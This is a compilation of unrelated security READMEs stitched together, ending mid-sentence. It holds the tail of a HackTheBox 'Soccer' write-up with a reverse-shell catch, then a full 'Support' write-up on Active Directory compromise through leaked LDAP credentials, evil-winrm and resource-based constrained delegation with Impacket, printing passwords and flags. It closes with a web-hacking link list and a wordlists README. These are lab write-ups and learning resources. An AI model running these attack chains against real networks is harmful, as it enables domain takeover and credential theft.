aio,cpu,cpu-adv,cpu-use,cpu24,disk,disk24,disk24-old,epoch,fs,int,int24,io,ipc,load,lock,mem,mem-adv,net,page, page24,proc,raw,socket,swap,swap-old,sys,tcp,time,udp,unix,vm,vm-adv,zones /usr/share/dstat: battery,battery-remain,condor-queue,cpufreq,dbus,disk-avgqu,disk-avgrq,disk-svctm,disk-tps,disk-util,disk-wait,dstat, dstat-cpu,dstat-ctxt,dstat-mem,fan,freespace,fuse,gpfs,gpfs-ops,helloworld,ib,innodb-buffer,innodb-io,innodb-ops, jvm-full,jvm-vm,lustre,md-status,memcache-hits,mongodb-conn,mongodb-mem,mongodb-opcount,mongodb-queue,mongodb-stats, mysql-io,mysql-keys,mysql5-cmds,mysql5-conn,mysql5-innodb,mysql5-innodb-basic,mysql5-innodb-extra,mysql5-io,mysql5-keys, net-packets,nfs3,nfs3-ops,nfsd3,nfsd3-ops,nfsd4-ops,nfsstat4,ntp,postfix,power,proc-count,qmail,redis,rpc,rpcd, sendmail,snmp-cpu,snmp-load,snmp-mem,snmp-net,snmp-net-err,snmp-sys,snooze,squid,test,thermal,top-bio,top-bio-adv, top-childwait,top-cpu,top-cpu-adv,top-cputime,top-cputime-avg,top-int,top-io,top-io-adv,top-latency,top-latency-avg, top-mem,top-oom,utmp,vm-cpu,vm-mem,vm-mem-adv,vmk-hba,vmk-int,vmk-nic,vz-cpu,vz-io,vz-ubc,wifi,zfs-arc,zfs-l2arc, zfs-zil /usr/local/share/dstat: ps ``` To run our plugin, we just need to add the flag `--ps` (where ps is the name of our plugin) to the `dstat` command: ```console player@soccer:/usr/local/share/dstat$ doas /usr/bin/dstat --ps /usr/bin/dstat:2619: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses import imp ``` This gives us a reverse shell: ```console nc -lvp 4242 listening on [any] 4242 ... connect to [10.10.14.10] from soccer.htb [10.10.11.194] 52922 # whoami whoami root # cat /root/root.txt cat /root/root.txt ea03f3d41d5800ef03388093e197c861 ``` And we get the root flag ```ea03f3d41d5800ef03388093e197c861```.
# Support - HackTheBox - Writeup Windows, 20 Base Points, Easy ![info.JPG](images/info.JPG) ## Machine ![‏‏Support.JPG](images/Support.JPG) ## TL;DR ***User***: By enumerating the SMB shares we found the file ```UserInfo.exe.zip``` on ```support-tools``` share, By decompiling the file using ```dnSpy``` we found the password of ```ldap``` user, Enumerating the domain users using ```ldapsearch``` using ```ldap``` credentials and we found the password of ```support``` user on ```info``` field. ***Root***: By running ```BloodHound``` we can see that ```support``` user has ``` AddAllowedToAct``` permission, Using that we create a new machine account and impersonate to ```Administrator``` user. ![pwn.JPG](images/pwn.JPG) ## Support Solution ### User Let's start with ```nmap``` scanning: ```console ┌─[evyatar@parrot]─[/hackthebox/Support] └──╼ $ nmap -sV -sC -oA nmap/Support 10.10.11.174 Starting Nmap 7.80 ( https://nmap.org ) at 2022-08-12 16:35 IDT Unable to split netmask from target expression: "nmap/Support" Nmap scan report for 10.10.11.174 Host is up (0.12s latency). Not shown: 989 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-12 13:35:41Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=8/12%Time=62F65731%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2022-08-12T13:38:05 |_ start_date: N/A 5985/tcp open wsman ``` By enumerating the SMB shares we can see the following: ```console ┌─[evyatar@parrot]─[/hackthebox/Support] └──╼ $ smbclient -L 10.10.11.174 Enter WORKGROUP\user's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share support-tools Disk support staff tools SYSVOL Disk Logon server share SMB1 disabled -- no workgroup available ``` Let's observe the ```support-tools``` share: ```console ``` Let's get the ```UserInfo.exe.zip``` file. By unzip this file we can see the following content: ```console ``` Let's open the ```UserInfo.exe``` file using [dnSpy](https://github.com/dnSpy/dnSpy). By observing the classes we found the following class ```Protect```: ![protect.JPG](images/protect.JPG) We can run the binary and set a breakpoint on ```getPassword()``` method to get the decrypted password. By running the binary on ```cmd``` we can see it's required the following parameters: ```console Z:\Userinfo>UserInfo.exe Usage: UserInfo.exe [options] [commands] Options: -v|--verbose Verbose output Commands: find Find a user user Get information about a user ``` Let's run it as follow: ```UserInfo.exe user -username Administrator```: ![debug.JPG](images/debug.JPG) We need to add a breakpoint on ```LdapQuery``` and by running it we can see the password: ![breakpoint.JPG](images/breakpoint.JPG) As we can see, the password is: ```nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz```. The function ```DirectoryEntry```is defined as ```public DirectoryEntry(string path, string username, string password)```, meaning that ```"support\\ldap"``` is the user name. Let's use ```ldapsearch``` to enumerate on domain users: ```console ┌─[evyatar@parrot]─[/hackthebox/Support] └──╼ $ ldapsearch -D support\\ldap -H ldap://10.10.11.174 -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=Users,DC=support,DC=htb' ... # support, Users, support.htb dn: CN=support,CN=Users,DC=support,DC=htb objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: support c: US l: Chapel Hill st: NC postalCode: 27514 distinguishedName: CN=support,CN=Users,DC=support,DC=htb instanceType: 4 whenCreated: 20220528111200.0Z whenChanged: 20220528111201.0Z uSNCreated: 12617 info: Ironside47pleasure40Watchful memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb uSNChanged: 12630 company: support streetAddress: Skipper Bowles Dr name: support objectGUID:: CqM5MfoxMEWepIBTs5an8Q== userAccountControl: 66048 badPwdCount: 5 codePage: 0 countryCode: 0 badPasswordTime: 133054975963857210 lastLogoff: 0 lastLogon: 0 pwdLastSet: 132982099209777070 primaryGroupID: 513 objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA== accountExpires: 9223372036854775807 logonCount: 0 sAMAccountName: support sAMAccountType: 805306368 objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb dSCorePropagationData: 20220528111201.0Z dSCorePropagationData: 16010101000000.0Z ... ``` As we can see, The ```info``` field of the user ```support``` contains the password ```Ironside47pleasure40Watchful```. Let's use ```evil-winrm``` using ```support``` credentials: ```console ┌─[evyatar@parrot]─[/hackthebox/Support] └──╼ $ evil-winrm -i support.htb -u support -p Ironside47pleasure40Watchful Evil-WinRM shell v3.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\support\Documents> *Evil-WinRM* PS C:\Users\support\Documents> cd ../Desktop *Evil-WinRM* PS C:\Users\support\Desktop> dir Directory: C:\Users\support\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 8/20/2022 11:38 AM 34 user.txt *Evil-WinRM* PS C:\Users\support\Desktop> type user.txt 1aa788a03886045ca23e5c4ea63205f3 ``` And we get the user flag ```1aa788a03886045ca23e5c4ea63205f3```. ### Root Let's run ```bloodhound``` as follows: ```console ┌─[evyatar@parrot]─[/hackthebox/Support] └──╼ $ python3 bloodhound.py -c all -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -d support.htb -gc dc.support.htb -ns 10.10.11.174 --zip INFO: Found AD domain: support.htb INFO: Connecting to LDAP server: dc.support.htb INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 2 computers INFO: Connecting to LDAP server: dc.support.htb INFO: Found 20 users INFO: Found 52 groups INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: Management.support.htb INFO: Querying computer: dc.support.htb INFO: Done in 00M 12S INFO: Compressing output into 20220820234224_bloodhound.zip ``` By running ```BloodHound``` we can see the following: ![bloodhound.JPG](images/bloodhound.JPG) As we can see, ```support``` user have [AddAllowedToAct](https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html#addallowedtoact) permission to the machine ```Management.support.htb```. We can abuse it using the following article[https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution). First, We need to load the following PS modules: 1. [PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) 2. [Powermad.ps1](https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1) ```powershell *Evil-WinRM* PS C:\Users\support\Documents> dir Directory: C:\Users\support\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 8/23/2022 5:36 AM 135587 Powermad.ps1 -a---- 8/23/2022 5:34 AM 770280 PowerView.ps1 *Evil-WinRM* PS C:\Users\support\Documents> Import-Module .\Powermad.ps1 *Evil-WinRM* PS C:\Users\support\Documents> Import-Module .\PowerView.ps1 ``` Next, Let's now create a new computer object for our computer ```FAKE01``` - this is the computer that will be trusted by our target computer later on: ```powershell *Evil-WinRM* PS C:\Users\support\Documents> New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose Verbose: [+] Domain Controller = dc.support.htb Verbose: [+] Domain = support.htb Verbose: [+] SAMAccountName = FAKE01$ Verbose: [+] Distinguished Name = CN=FAKE01,CN=Computers,DC=support,DC=htb [+] Machine account FAKE01 added ``` Let's get the SID of the created machine: ```powershell *Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer fake01 | Select objectsId objectsid --------- S-1-5-21-1677581083-3380853377-188903654-5101 ``` Create a new raw security descriptor for the ```FAKE01``` computer principal: ```powershell *Evil-WinRM* PS C:\Users\support\Documents> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5101)" *Evil-WinRM* PS C:\Users\support\Documents> $SDBytes = New-Object byte[] ($SD.BinaryLength) *Evil-WinRM* PS C:\Users\support\Documents> $SD.GetBinaryForm($SDBytes, 0) ``` Applying the security descriptor bytes to our ```dc```: ```powershell *Evil-WinRM* PS C:\Users\support\Documents> hostname dc *Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose Verbose: [Get-DomainSearcher] search base: LDAP://DC=support,DC=htb Verbose: [Get-DomainObject] Extracted domain 'support.htb' from 'CN=DC,OU=Domain Controllers,DC=support,DC=htb' Verbose: [Get-DomainSearcher] search base: LDAP://DC=support,DC=htb Verbose: [Get-DomainObject] Get-DomainObject filter string: (&(|(distinguishedname=CN=DC,OU=Domain Controllers,DC=support,DC=htb))) Verbose: [Set-DomainObject] Setting 'msds-allowedtoactonbehalfofotheridentity' to '1 0 4 128 20 0 0 0 0 0 0 0 0 0 0 0 36 0 0 0 1 2 0 0 0 0 0 5 32 0 0 0 32 2 0 0 2 0 44 0 1 0 0 0 0 0 36 0 255 1 15 0 1 5 0 0 0 0 0 5 21 0 0 0 27 219 253 99 129 186 131 201 230 112 66 11 237 19 0 0' for object 'DC$' ``` Next, Let's create Service-Ticket of ```Administrator``` using [Impacket-getST](https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py): ```console ┌─[evyatar@parrot]─[/hackthebox/Support] └──╼ $ python3 ./getST.py support.htb/fake01:123456 -dc-ip 10.10.11.174 -impersonate administrator -spn www/dc.support.htb Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation [-] CCache file is not found. Skipping... [*] Getting TGT for user [*] Impersonating administrator [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in administrator.ccache ``` We can use this ticket to connect with ```wmiexec``` and become ```Administrator```: ```console ┌─[evyatar@parrot]─[/hackthebox/Support] └──╼ $export KRB5CCNAME=administrator.ccache ┌─[evyatar@parrot]─[/hackthebox/Support] └──╼ $ python3 ./wmiexec.py support.htb/[email protected] -no-pass -k Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation [*] SMBv3.0 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\>whoami support\administrator C:\>type Users\Administrator\Desktop\root.txt ceb3f224913bd884d05d3645a3994cdc ``` And we get the root flag ```ceb3f224913bd884d05d3645a3994cdc```.
# awesome-web-hacking This list is for anyone wishing to learn about web application security but do not have a starting point. You can help by sending Pull Requests to add more information. If you're not inclined to make PRs you can tweet me at `@infoslack` Table of Contents ================= * [Books](#books) * [Documentation](#documentation) * [Tools](#tools) * [Cheat Sheets](#cheat-sheets) * [Docker](#docker-images-for-penetration-testing) * [Vulnerabilities](#vulnerabilities) * [Courses](#courses) * [Online Hacking Demonstration Sites](#online-hacking-demonstration-sites) * [Labs](#labs) * [SSL](#ssl) * [Security Ruby on Rails](#security-ruby-on-rails) ## Books * http://www.amazon.com/The-Web-Application-Hackers-Handbook/dp/8126533404/ The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws * http://www.amazon.com/Hacking-Web-Apps-Preventing-Application/dp/159749951X/ Hacking Web Apps: Detecting and Preventing Web Application Security Problems * http://www.amazon.com/Hacking-Exposed-Web-Applications-Third/dp/0071740643/ Hacking Exposed Web Applications * http://www.amazon.com/SQL-Injection-Attacks-Defense-Second/dp/1597499633/ SQL Injection Attacks and Defense * http://www.amazon.com/Tangled-Web-Securing-Modern-Applications/dp/1593273886/ The Tangled WEB: A Guide to Securing Modern Web Applications * http://www.amazon.com/Web-Application-Obfuscation-Evasion-Filters/dp/1597496049/ Web Application Obfuscation: '-/WAFs..Evasion..Filters//alert(/Obfuscation/)-' * http://www.amazon.com/XSS-Attacks-Scripting-Exploits-Defense/dp/1597491543/ XSS Attacks: Cross Site Scripting Exploits and Defense * http://www.amazon.com/Browser-Hackers-Handbook-Wade-Alcorn/dp/1118662091/ The Browser Hacker’s Handbook * http://www.amazon.com/Basics-Web-Hacking-Techniques-Attack/dp/0124166008/ The Basics of Web Hacking: Tools and Techniques to Attack the Web * http://www.amazon.com/Web-Penetration-Testing-Kali-Linux/dp/1782163166/ Web Penetration Testing with Kali Linux * http://www.amazon.com/Web-Application-Security-Beginners-Guide/dp/0071776168/ Web Application Security, A Beginner's Guide * https://www.crypto101.io/ - Crypto 101 is an introductory course on cryptography * http://www.offensive-security.com/metasploit-unleashed/ - Metasploit Unleashed * http://www.cl.cam.ac.uk/~rja14/book.html - Security Engineering * https://www.feistyduck.com/library/openssl-cookbook/ - OpenSSL Cookbook ## Documentation * https://www.owasp.org/ - Open Web Application Security Project * http://www.pentest-standard.org/ - Penetration Testing Execution Standard * http://www.binary-auditing.com/ - Dr. Thorsten Schneider’s Binary Auditing * https://appsecwiki.com/ - Application Security Wiki is an initiative to provide all Application security related resources to Security Researchers and developers at one place. ## Tools * http://www.metasploit.com/ - World's most used penetration testing software * http://www.arachni-scanner.com/ - Web Application Security Scanner Framework * https://github.com/sullo/nikto - Nikto web server scanner * http://www.tenable.com/products/nessus-vulnerability-scanner - Nessus Vulnerability Scanner * http://www.portswigger.net/burp/intruder.html - Burp Intruder is a tool for automating customized attacks against web apps. * http://www.openvas.org/ - The world's most advanced Open Source vulnerability scanner and manager. * https://github.com/iSECPartners/Scout2 - Security auditing tool for AWS environments * https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project - Is a multi threaded java application designed to brute force directories and files names on web/application servers. * https://www.owasp.org/index.php/ZAP - The Zed Attack Proxy is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. * https://github.com/tecknicaltom/dsniff - dsniff is a collection of tools for network auditing and penetration testing.   * https://github.com/WangYihang/Webshell-Sniper - Manage your webshell via terminal.   * https://github.com/DanMcInerney/dnsspoof - DNS spoofer. Drops DNS responses from the router and replaces it with the spoofed DNS response * https://github.com/trustedsec/social-engineer-toolkit - The Social-Engineer Toolkit (SET) repository from TrustedSec * https://github.com/sqlmapproject/sqlmap - Automatic SQL injection and database takeover tool * https://github.com/beefproject/beef - The Browser Exploitation Framework Project * http://w3af.org/ - w3af is a Web Application Attack and Audit Framework * https://github.com/espreto/wpsploit - WPSploit, Exploiting Wordpress With Metasploit   * https://github.com/WangYihang/Reverse-Shell-Manager - Reverse shell manager via terminal.   * https://github.com/RUB-NDS/WS-Attacker - WS-Attacker is a modular framework for web services penetration testing * https://github.com/wpscanteam/wpscan - WPScan is a black box WordPress vulnerability scanner * http://sourceforge.net/projects/paros/ Paros proxy * https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project Web Scarab proxy * https://code.google.com/p/skipfish/ Skipfish, an active web application security reconnaissance tool * http://www.acunetix.com/vulnerability-scanner/ Acunetix Web Vulnerability Scanner * https://cystack.net/ CyStack Web Security Platform * http://www-03.ibm.com/software/products/en/appscan IBM Security AppScan * https://www.netsparker.com/web-vulnerability-scanner/ Netsparker web vulnerability scanner * http://www8.hp.com/us/en/software-solutions/webinspect-dynamic-analysis-dast/index.html HP Web Inspect * https://github.com/sensepost/wikto Wikto - Nikto for Windows with some extra features * http://samurai.inguardians.com Samurai Web Testing Framework * https://code.google.com/p/ratproxy/ Ratproxy * http://www.websecurify.com Websecurify * http://sourceforge.net/projects/grendel/ Grendel-scan * https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project DirBuster * http://www.edge-security.com/wfuzz.php Wfuzz * http://wapiti.sourceforge.net wapiti * https://github.com/neuroo/grabber Grabber * https://subgraph.com/vega/ Vega * http://websecuritytool.codeplex.com Watcher passive web scanner * http://xss.codeplex.com x5s XSS and Unicode transformations security testing assistant * http://www.beyondsecurity.com/avds AVDS Vulnerability Assessment and Management * http://www.golismero.com Golismero * http://www.ikare-monitoring.com IKare * http://www.nstalker.com N-Stalker X * https://www.rapid7.com/products/nexpose/index.jsp Nexpose * http://www.rapid7.com/products/appspider/ App Spider * http://www.milescan.com ParosPro * https://www.qualys.com/enterprises/qualysguard/web-application-scanning/ Qualys Web Application Scanning * http://www.beyondtrust.com/Products/RetinaNetworkSecurityScanner/ Retina * https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework Xenotix XSS Exploit Framework * https://github.com/future-architect/vuls Vulnerability scanner for Linux, agentless, written in golang. * https://github.com/rastating/wordpress-exploit-framework A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems. * http://www.xss-payloads.com/ XSS Payloads to leverage XSS vulnerabilities, build custom payloads, practice penetration testing skills. * https://github.com/joaomatosf/jexboss JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool * https://github.com/commixproject/commix Automated All-in-One OS command injection and exploitation tool * https://github.com/pathetiq/BurpSmartBuster A Burp Suite content discovery plugin that add the smart into the Buster! * https://github.com/GoSecure/csp-auditor Burp and ZAP plugin to analyze CSP headers * https://github.com/ffleming/timing_attack Perform timing attacks against web applications * https://github.com/lalithr95/fuzzapi Fuzzapi is a tool used for REST API pentesting * https://github.com/owtf/owtf Offensive Web Testing Framework (OWTF) * https://github.com/nccgroup/wssip Application for capturing, modifying and sending custom WebSocket data from client to server and vice versa. * https://github.com/tijme/angularjs-csti-scanner Automated client-side template injection (sandbox escape/bypass) detection for AngularJS (ACSTIS). ## Cheat Sheets * http://n0p.net/penguicon/php_app_sec/mirror/xss.html - XSS cheatsheet * https://highon.coffee/blog/lfi-cheat-sheet/ - LFI Cheat Sheet * https://highon.coffee/blog/reverse-shell-cheat-sheet/ - Reverse Shell Cheat Sheet * https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/ - SQL Injection Cheat Sheet * https://www.gracefulsecurity.com/path-traversal-cheat-sheet-windows/ - Path Traversal Cheat Sheet: Windows ## Docker images for Penetration Testing * `docker pull kalilinux/kali-linux-docker` [official Kali Linux](https://hub.docker.com/r/kalilinux/kali-linux-docker/) * `docker pull owasp/zap2docker-stable` - [official OWASP ZAP](https://github.com/zaproxy/zaproxy) * `docker pull wpscanteam/wpscan` - [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/) * `docker pull pandrew/metasploit` - [docker-metasploit](https://hub.docker.com/r/pandrew/metasploit/) * `docker pull citizenstig/dvwa` - [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/citizenstig/dvwa/) * `docker pull wpscanteam/vulnerablewordpress` - [Vulnerable WordPress Installation](https://hub.docker.com/r/wpscanteam/vulnerablewordpress/) * `docker pull hmlio/vaas-cve-2014-6271` - [Vulnerability as a service: Shellshock](https://hub.docker.com/r/hmlio/vaas-cve-2014-6271/) * `docker pull hmlio/vaas-cve-2014-0160` - [Vulnerability as a service: Heartbleed](https://hub.docker.com/r/hmlio/vaas-cve-2014-0160/) * `docker pull opendns/security-ninjas` - [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/) * `docker pull usertaken/archlinux-pentest-lxde` - [Arch Linux Penetration Tester](https://hub.docker.com/r/usertaken/archlinux-pentest-lxde/) * `docker pull diogomonica/docker-bench-security` - [Docker Bench for Security](https://hub.docker.com/r/diogomonica/docker-bench-security/) * `docker pull ismisepaul/securityshepherd` - [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/) * `docker pull danmx/docker-owasp-webgoat` - [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/) * `docker pull citizenstig/nowasp` - [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/) ## Vulnerabilities * http://cve.mitre.org/ - Common Vulnerabilities and Exposures. The Standard for Information Security Vulnerability Names * https://www.exploit-db.com/ - The Exploit Database – ultimate archive of Exploits, Shellcode, and Security Papers. * http://0day.today/ - Inj3ct0r is the ultimate database of exploits and vulnerabilities and a great resource for vulnerability researchers and security professionals. * http://osvdb.org/ - OSVDB's goal is to provide accurate, detailed, current, and unbiased technical security information. * http://www.securityfocus.com/ - Since its inception in 1999, SecurityFocus has been a mainstay in the security community. * http://packetstormsecurity.com/ - Global Security Resource * https://wpvulndb.com/ - WPScan Vulnerability Database ## Courses * https://www.elearnsecurity.com/course/web_application_penetration_testing/ eLearnSecurity Web Application Penetration Testing * https://www.elearnsecurity.com/course/web_application_penetration_testing_extreme/ eLearnSecurity Web Application Penetration Testing eXtreme * https://www.offensive-security.com/information-security-training/advanced-web-attack-and-exploitation/ Offensive Security Advanced Web Attacks and Exploitation (live) * https://www.sans.org/course/web-app-penetration-testing-ethical-hacking Sans SEC542: Web App Penetration Testing and Ethical Hacking * https://www.sans.org/course/advanced-web-app-penetration-testing-ethical-hacking Sans SEC642: Advanced Web App Penetration Testing and Ethical Hacking * http://opensecuritytraining.info/ - Open Security Training * http://securitytrainings.net/security-trainings/ - Security Exploded Training * http://www.cs.fsu.edu/~redwood/OffensiveComputerSecurity/ - FSU - Offensive Computer Security * http://www.cs.fsu.edu/~lawrence/OffNetSec/ - FSU - Offensive Network Security * http://www.securitytube.net/ - World’s largest Infosec and Hacking Portal. * https://www.hacker101.com/ - Free class for web security by [Hackerone](https://www.hackerone.com) ## Online Hacking Demonstration Sites * http://testasp.vulnweb.com/ - Acunetix ASP test and demonstration site * http://testaspnet.vulnweb.com/ - Acunetix ASP.Net test and demonstration site * http://testphp.vulnweb.com/ - Acunetix PHP test and demonstration site * http://crackme.cenzic.com/kelev/view/home.php - Crack Me Bank * http://zero.webappsecurity.com/ - Zero Bank * http://demo.testfire.net/ - Altoro Mutual ## Labs * http://www.cis.syr.edu/~wedu/seed/all_labs.html - Developing Instructional Laboratories for Computer SEcurity EDucation * https://www.vulnhub.com/ - Virtual Machines for Localhost Penetration Testing. * https://pentesterlab.com/ - PentesterLab is an easy and great way to learn penetration testing. * https://github.com/jerryhoff/WebGoat.NET - This web application is a learning platform about common web security flaws. * http://www.dvwa.co.uk/ - Damn Vulnerable Web Application (DVWA) * http://sourceforge.net/projects/lampsecurity/ - LAMPSecurity Training * https://github.com/Audi-1/sqli-labs - SQLI labs to test error based, Blind boolean based, Time based. * https://github.com/paralax/lfi-labs - small set of PHP scripts to practice exploiting LFI, RFI and CMD injection vulns * https://hack.me/ - Build, host and share vulnerable web apps in a sandboxed environment for free * http://azcwr.org/az-cyber-warfare-ranges - Free live fire Capture the Flag, blue team, red team Cyber Warfare Range for beginners through advanced users. Must use a cell phone to send a text message requesting access to the range. * https://github.com/adamdoupe/WackoPicko - WackoPicko is a vulnerable web application used to test web application vulnerability scanners. * https://github.com/rapid7/hackazon - Hackazon is a free, vulnerable test site that is an online storefront built with the same technologies used in today’s rich client and mobile applications. * https://github.com/RhinoSecurityLabs/cloudgoat - Rhino Security Labs' "Vulnerable by Design" AWS infrastructure setup tool * https://www.hackthebox.eu/ - Hack The Box is an online platform allowing you to test and advance your skills in cyber security. ## SSL * https://www.ssllabs.com/ssltest/index.html - This service performs a deep analysis of the configuration of any SSL web server on the public Internet. * https://raymii.org/s/tutorials/Strong_SSL_Security_On_nginx.html - Strong SSL Security on nginx * https://weakdh.org/ - Weak Diffie-Hellman and the Logjam Attack * https://letsencrypt.org/ - Let’s Encrypt is a new Certificate Authority: It’s free, automated, and open. * https://filippo.io/Heartbleed/ - A checker (site and tool) for CVE-2014-0160 (Heartbleed). ## Security Ruby on Rails * http://brakemanscanner.org/ - A static analysis security vulnerability scanner for Ruby on Rails applications. * https://github.com/rubysec/ruby-advisory-db - A database of vulnerable Ruby Gems * https://github.com/rubysec/bundler-audit - Patch-level verification for Bundler * https://github.com/hakirisec/hakiri_toolbelt - Hakiri Toolbelt is a command line interface for the Hakiri platform. * https://hakiri.io/facets - Scan Gemfile.lock for vulnerabilities. * http://rails-sqli.org/ - This page lists many query methods and options in ActiveRecord which do not sanitize raw SQL arguments and are not intended to be called with unsafe user input. * https://github.com/0xsauby/yasuo - A ruby script that scans for vulnerable & exploitable 3rd-party web applications on a network
<h1 align="center">Wordlists <a href="https://twitter.com/intent/tweet?text=Wordlists%20-%20Real-world%20infosec%20wordlists%2C%20updated%20regularly%20by%20%40trick3st%0A%0Ahttps%3A%2F%2Fgithub.com%2Ftrickest%2Fwordlists&hashtags=bugbounty,bugbountytips,infosec"><img src="https://img.shields.io/badge/Tweet--lightgrey?logo=twitter&style=social" alt="Tweet" height="20"/></a></h1> <h3 align="center">Real-world infosec wordlists, updated regularly</h3> ![Trickest Wordlists](images/cover.png "Trickest Wordlists") ## Current Wordlists ### Technologies These wordlists are based on the source code of the CMSes/servers/frameworks listed [here](technology-repositories.json). The current wordlists include: - Wordpress - Joomla - Drupal - Magento - Ghost - Tomcat There are 2 versions of each wordlist: - Base (example [tomcat.txt](technologies/tomcat.txt)): Lists the full paths of each file in the repository ``` webapps/examples/WEB-INF/classes/websocket/echo/servers.json ``` - All levels (example [tomcat-all-levels.txt](technologies/tomcat-all-levels.txt)): Includes all directory levels of the files in the base wordlist - if you have tried [dsieve](https://github.com/trickest/dsieve), this is going to look familiar! This wordlist will be larger than the base wordlist but it accounts for cases where the directory structure of the repository isn't mapped perfectly on the target. ``` webapps/examples/WEB-INF/classes/websocket/echo/servers.json examples/WEB-INF/classes/websocket/echo/servers.json WEB-INF/classes/websocket/echo/servers.json websocket/echo/servers.json echo/servers.json servers.json ``` ### Robots Inspired by Daniel Miessler's [RobotsDisallowed](https://github.com/danielmiessler/RobotsDisallowed) project, these wordlists contain the `robots.txt` `Allow` and `Disallow` paths in the top 100, top 1000, and top 10000 websites according to [Domcop's Open PageRank dataset](https://www.domcop.com/top-10-million-websites). ### Inventory Subdomains This wordlist contains the subdomains found for each target on the [Inventory](https://github.com/trickest/inventory) project. It consists of 1.4 million words generated from the subdomains of over 50 public bug bounty programs. ### Cloud Subdomains This wordlist contains the subdomains found through enumerating [cloud](https://github.com/trickest/cloud) assets. It consists of 940k words generated from the subdomains extracted from the `Common Name`s and `Subject Alternative Name`s of over 7 million SSL certificates. And more wordlists to come! ## How it Works ### Technologies A [Trickest](https://trickest.com) workflow clones the repositories in [technology-repositories.json](technology-repositories.json), lists the paths of all their files, removes non-interesting files, generates combinations, and pushes the wordlists to this repository. ![Trickest Workflow](images/technologies.png "Trickest Workflow - wordlists/technolgies") ### Robots Another [Trickest](https://trickest.com) workflow gets the top 100, 1000, and 1000 websites from [Domcop's Open PageRank dataset](https://www.domcop.com/top-10-million-websites), uses [meg](https://github.com/tomnomnom/meg) to fetch their `robots.txt` files (Thanks, [@tomnomnom](https://github.com/tomnomnom)!), removes irrelevant entries, cleans up the paths, and pushes the wordlists to this repository. ![Trickest Workflow](images/robots.png "Trickest Workflow - wordlists/robots") ## Contribution All contributions/suggestions/questions are welcome! Feel free to create a new ticket via [GitHub issues](https://github.com/trickest/wordlists/issues), tweet at us [@trick3st](https://twitter.com/trick3st), or join the 